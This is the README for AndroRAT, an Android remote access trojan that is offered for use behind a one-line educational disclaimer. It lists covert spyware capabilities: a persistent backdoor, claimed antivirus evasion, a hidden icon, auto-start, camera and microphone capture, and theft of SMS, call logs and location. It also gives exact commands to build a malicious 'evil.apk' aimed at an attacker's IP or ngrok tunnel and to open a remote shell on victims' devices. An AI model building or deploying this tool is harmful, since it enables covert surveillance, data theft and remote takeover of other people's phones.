Disclaimer : This software is meant for educational purposes only. I'm not responsible for any malicious use of the app.
AndroRAT
AndroRAT is a tool designed to give the control of the android system remotely and retrieve informations from it. Androrat is a client/server application developed in Java Android for the client side and the Server is in Python.
AndroRAT will work on device from Android 4.1 (Jelly Bean) to Android 9.0 (Oreo) (API 16 to API 28)
AndroRAT also works on Android 10 (Q) but some of the interpreter command will be unstable.
Screenshots
Features of AndroRAT
Full persistent backdoor
Fully undetectable by any antivirus scannerVirusTotalInvisible icon on install
Light weight apk which runs 24*7 in background
App starts automatically on boot up
Can record audio, video, take picture from both camera
Browse call logs and SMS logs
Get current location, sim card details ,ip, mac address of the device
Prerequisites
AndroRAT requires Python3 and JAVA (or Android Studio)
Installation
Note:
While cloning the repository using Git bash on Windows, you may get the following error:
error: unable to create file <filename>: Filename too long
This is because the Git has a limit of 4096 characters for a filename, except on Windows when Git is compiled with msys. It uses an older version of the Windows API and there's a limit of 260 characters for a filename.
You can circumvent this by setting core.longpaths
to true
.
git config --system core.longpaths true
You must run Git bash with administrator privileges.
Usage (Windows and Linux)
To get the control panel of the app dial
*#*#1337#*#*
(For now it has only two optionsRestart Activity
andUninstall
)
Note: In order to use this feature in some devices you need to enable the option
display pop-up windows running in background
from the settings.
Available Modes
--build
- for building the android apk--ngrok
- for using ngrok tunnel (over the internet)--shell
- getting an interactive shell of the device
build
mode
Or you can manually build the apk by importing Android Code folder to Android Studio and changing the IP address and port number in config.java file and then you can generate the signed apk from Android Studio -> Build -> Generate Signed APK(s)
shell
mode
After running the shell
mode you will get an interpreter of the device
Commands which can run on the interpreter
In the sh shell there are some sub commands
Examples
To build the apk using ngrok which will also set the listner:
python3 androRAT.py --build --ngrok -o evil.apk
To build the apk using desired ip and port:
python3 androRAT.py --build -i 192.169.x.x -p 8000 -o evil.apk
To get the interpreter:
python3 androRAT.py --shell -i 0.0.0.0 -p 8000
Interpreter Examples
Generating APK
Some interpreter Commands
Supporters:
TODO
Ngrok supportSet up multi client
Add screenshot command
License
AndroRAT is licensed under MIT license take a look at the LICENSE for more information.